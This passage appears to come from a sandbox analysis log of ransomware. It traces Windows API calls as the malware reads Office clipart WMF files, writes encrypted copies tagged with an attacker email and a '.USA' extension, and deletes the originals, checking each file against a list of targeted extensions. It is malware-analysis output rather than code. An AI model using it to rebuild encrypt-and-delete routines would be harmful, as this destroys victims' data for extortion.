nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xbc8, lpOverlapped=0x0) returned 1 [0272.248] WriteFile (in: hFile=0x2bc, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xbd0, lpOverlapped=0x0) returned 1 [0272.249] ReadFile (in: hFile=0x3b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.249] WriteFile (in: hFile=0x2bc, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.249] SetEndOfFile (hFile=0x2bc) returned 1 [0272.249] CloseHandle (hObject=0x2bc) returned 1 [0272.249] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.249] SetEndOfFile (hFile=0x3b4) returned 1 [0272.251] CloseHandle (hObject=0x3b4) returned 1 [0272.251] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.357] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00276_.wmf")) returned 1 [0272.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63 [0272.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63 [0272.393] lstrlenW (lpString=".doc") returned 4 [0272.393] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.393] lstrlenW (lpString=".docx") returned 5 [0272.393] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.393] lstrlenW (lpString=".pdf") returned 4 [0272.393] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.393] lstrlenW (lpString=".xls") returned 4 [0272.393] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.393] lstrlenW (lpString=".xlsx") returned 5 [0272.393] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.393] lstrlenW (lpString=".ppt") returned 4 [0272.393] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63 [0272.393] lstrlenW (lpString=".zip") returned 4 [0272.393] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.393] lstrlenW (lpString=".rar") returned 4 [0272.393] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.393] lstrlenW (lpString=".bz2") returned 4 [0272.393] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.393] lstrlenW (lpString=".7z") returned 3 [0272.393] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63 [0272.394] lstrlenW (lpString=".dbf") returned 4 [0272.394] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63 [0272.394] lstrlenW (lpString=".1cd") returned 4 [0272.394] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63 [0272.394] lstrlenW (lpString=".jpg") returned 4 [0272.394] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63 [0272.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63 [0272.394] lstrlenW (lpString=".doc") returned 4 [0272.394] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.394] lstrlenW (lpString=".docx") returned 5 [0272.394] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.394] lstrlenW (lpString=".pdf") returned 4 [0272.394] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.394] lstrlenW (lpString=".xls") returned 4 [0272.394] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.394] lstrlenW (lpString=".xlsx") returned 5 [0272.394] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.394] lstrlenW (lpString=".ppt") returned 4 [0272.394] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63 [0272.394] lstrlenW (lpString=".zip") returned 4 [0272.394] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.394] lstrlenW (lpString=".rar") returned 4 [0272.394] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.394] lstrlenW (lpString=".bz2") returned 4 [0272.394] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.394] lstrlenW (lpString=".7z") returned 3 [0272.394] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63 [0272.395] lstrlenW (lpString=".dbf") returned 4 [0272.395] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63 [0272.395] lstrlenW (lpString=".1cd") returned 4 [0272.395] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63 [0272.395] lstrlenW (lpString=".jpg") returned 4 [0272.395] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.395] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.395] lstrlenW (lpString="HH00546_.WMF") returned 12 [0272.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00546_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.395] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=3718) returned 1 [0272.395] CloseHandle (hObject=0x388) returned 1 [0272.395] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00546_.wmf")) returned 0x20 [0272.395] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00546_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00546_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.396] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.396] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00546_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.396] GetLastError () returned 0x0 [0272.396] ReadFile (in: hFile=0x388, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xe86, lpOverlapped=0x0) returned 1 [0272.414] WriteFile (in: hFile=0x39c, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xe90, lpOverlapped=0x0) returned 1 [0272.415] ReadFile (in: hFile=0x388, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.415] WriteFile (in: hFile=0x39c, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.415] SetEndOfFile (hFile=0x39c) returned 1 [0272.415] CloseHandle (hObject=0x39c) returned 1 [0272.415] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.415] SetEndOfFile (hFile=0x388) returned 1 [0272.417] CloseHandle (hObject=0x388) returned 1 [0272.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.417] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00546_.wmf")) returned 1 [0272.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63 [0272.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63 [0272.418] lstrlenW (lpString=".doc") returned 4 [0272.418] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.418] lstrlenW (lpString=".docx") returned 5 [0272.418] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.418] lstrlenW (lpString=".pdf") returned 4 [0272.418] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.418] lstrlenW (lpString=".xls") returned 4 [0272.418] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.418] lstrlenW (lpString=".xlsx") returned 5 [0272.418] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.418] lstrlenW (lpString=".ppt") returned 4 [0272.418] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63 [0272.418] lstrlenW (lpString=".zip") returned 4 [0272.418] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.418] lstrlenW (lpString=".rar") returned 4 [0272.418] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.418] lstrlenW (lpString=".bz2") returned 4 [0272.418] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.418] lstrlenW (lpString=".7z") returned 3 [0272.418] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63 [0272.418] lstrlenW (lpString=".dbf") returned 4 [0272.418] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63 [0272.418] lstrlenW (lpString=".1cd") returned 4 [0272.418] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63 [0272.419] lstrlenW (lpString=".jpg") returned 4 [0272.419] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63 [0272.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63 [0272.419] lstrlenW (lpString=".doc") returned 4 [0272.419] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.419] lstrlenW (lpString=".docx") returned 5 [0272.419] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.419] lstrlenW (lpString=".pdf") returned 4 [0272.419] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.419] lstrlenW (lpString=".xls") returned 4 [0272.419] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.419] lstrlenW (lpString=".xlsx") returned 5 [0272.419] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.419] lstrlenW (lpString=".ppt") returned 4 [0272.419] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63 [0272.419] lstrlenW (lpString=".zip") returned 4 [0272.419] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.419] lstrlenW (lpString=".rar") returned 4 [0272.419] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.419] lstrlenW (lpString=".bz2") returned 4 [0272.419] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.419] lstrlenW (lpString=".7z") returned 3 [0272.419] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63 [0272.419] lstrlenW (lpString=".dbf") returned 4 [0272.419] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63 [0272.419] lstrlenW (lpString=".1cd") returned 4 [0272.420] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63 [0272.420] lstrlenW (lpString=".jpg") returned 4 [0272.420] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.420] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.420] lstrlenW (lpString="HH00602_.WMF") returned 12 [0272.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.420] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=1400) returned 1 [0272.420] CloseHandle (hObject=0x388) returned 1 [0272.420] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf")) returned 0x20 [0272.420] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.421] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.421] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.421] GetLastError () returned 0x0 [0272.421] ReadFile (in: hFile=0x388, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x578, lpOverlapped=0x0) returned 1 [0272.464] WriteFile (in: hFile=0x39c, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x580, lpOverlapped=0x0) returned 1 [0272.465] ReadFile (in: hFile=0x388, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.465] WriteFile (in: hFile=0x39c, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.465] SetEndOfFile (hFile=0x39c) returned 1 [0272.465] CloseHandle (hObject=0x39c) returned 1 [0272.465] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.465] SetEndOfFile (hFile=0x388) returned 1 [0272.467] CloseHandle (hObject=0x388) returned 1 [0272.467] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.486] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf")) returned 1 [0272.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63 [0272.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63 [0272.487] lstrlenW (lpString=".doc") returned 4 [0272.487] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.487] lstrlenW (lpString=".docx") returned 5 [0272.487] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.487] lstrlenW (lpString=".pdf") returned 4 [0272.487] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.487] lstrlenW (lpString=".xls") returned 4 [0272.487] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.487] lstrlenW (lpString=".xlsx") returned 5 [0272.487] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.487] lstrlenW (lpString=".ppt") returned 4 [0272.487] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63 [0272.487] lstrlenW (lpString=".zip") returned 4 [0272.487] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.487] lstrlenW (lpString=".rar") returned 4 [0272.487] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.487] lstrlenW (lpString=".bz2") returned 4 [0272.487] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.487] lstrlenW (lpString=".7z") returned 3 [0272.487] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63 [0272.488] lstrlenW (lpString=".dbf") returned 4 [0272.488] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63 [0272.488] lstrlenW (lpString=".1cd") returned 4 [0272.488] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63 [0272.488] lstrlenW (lpString=".jpg") returned 4 [0272.488] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63 [0272.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63 [0272.488] lstrlenW (lpString=".doc") returned 4 [0272.488] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.488] lstrlenW (lpString=".docx") returned 5 [0272.488] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.488] lstrlenW (lpString=".pdf") returned 4 [0272.488] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.488] lstrlenW (lpString=".xls") returned 4 [0272.488] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.488] lstrlenW (lpString=".xlsx") returned 5 [0272.488] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.488] lstrlenW (lpString=".ppt") returned 4 [0272.488] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63 [0272.488] lstrlenW (lpString=".zip") returned 4 [0272.488] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.488] lstrlenW (lpString=".rar") returned 4 [0272.488] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.488] lstrlenW (lpString=".bz2") returned 4 [0272.488] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.488] lstrlenW (lpString=".7z") returned 3 [0272.489] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63 [0272.489] lstrlenW (lpString=".dbf") returned 4 [0272.489] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63 [0272.489] lstrlenW (lpString=".1cd") returned 4 [0272.489] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63 [0272.489] lstrlenW (lpString=".jpg") returned 4 [0272.489] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.489] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.489] lstrlenW (lpString="HH00669_.WMF") returned 12 [0272.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.705] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=11490) returned 1 [0272.705] CloseHandle (hObject=0x3a4) returned 1 [0272.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf")) returned 0x20 [0272.909] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0272.909] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.909] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0272.909] GetLastError () returned 0x0 [0272.909] ReadFile (in: hFile=0x2b0, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x2ce2, lpOverlapped=0x0) returned 1 [0272.951] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x2cf0, lpOverlapped=0x0) returned 1 [0272.952] ReadFile (in: hFile=0x2b0, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, 